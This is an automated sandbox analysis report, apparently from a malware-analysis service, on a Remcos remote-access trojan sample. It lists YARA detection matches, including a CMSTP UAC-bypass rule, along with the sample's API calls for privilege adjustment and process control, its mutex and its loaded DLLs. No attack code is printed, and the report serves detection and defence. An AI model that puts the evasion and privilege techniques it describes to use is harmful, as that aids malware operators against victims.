                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041AECC OpenProcess,NtSuspendProcess,CloseHandle,1_2_0041AECC
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041AEF8 OpenProcess,NtResumeProcess,CloseHandle,1_2_0041AEF8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00415A51 ExitWindowsEx,LoadLibraryA,GetProcAddress,1_2_00415A51
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043D04B1_2_0043D04B
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0042707E1_2_0042707E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041301D1_2_0041301D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004410301_2_00441030
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004531101_2_00453110
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004271B81_2_004271B8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041D27C1_2_0041D27C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004522E21_2_004522E2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043D2A81_2_0043D2A8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004373601_2_00437360
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004363BA1_2_004363BA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0042645F1_2_0042645F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004315821_2_00431582
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043672C1_2_0043672C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041E7EA1_2_0041E7EA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044C9491_2_0044C949
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004269D61_2_004269D6
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004369D61_2_004369D6
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043CBED1_2_0043CBED
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00432C541_2_00432C54
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00436C9D1_2_00436C9D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043CE1C1_2_0043CE1C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00436F581_2_00436F58
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434F321_2_00434F32
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 00401F66 appears 50 times
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 004020E7 appears 40 times
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 00433AB0 appears 42 times
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 004341C0 appears 55 times
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00416C9D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_00416C9D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040E2F1 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,1_2_0040E2F1
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041A84A FindResourceA,LoadResource,LockResource,SizeofResource,1_2_0041A84A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419DBA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].jsonJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-JLQBNY
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Software\1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Rmc-JLQBNY1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Exe1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Exe1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Rmc-JLQBNY1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: 0TG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Inj1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Inj1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: PSG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: exepath1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: PSG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: exepath1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: licence1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: dMG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: hSG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Administrator1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: User1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: del1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: del1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: del1_2_0040D83A
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeReversingLabs: Detection: 71%
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeVirustotal: Detection: 64%
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
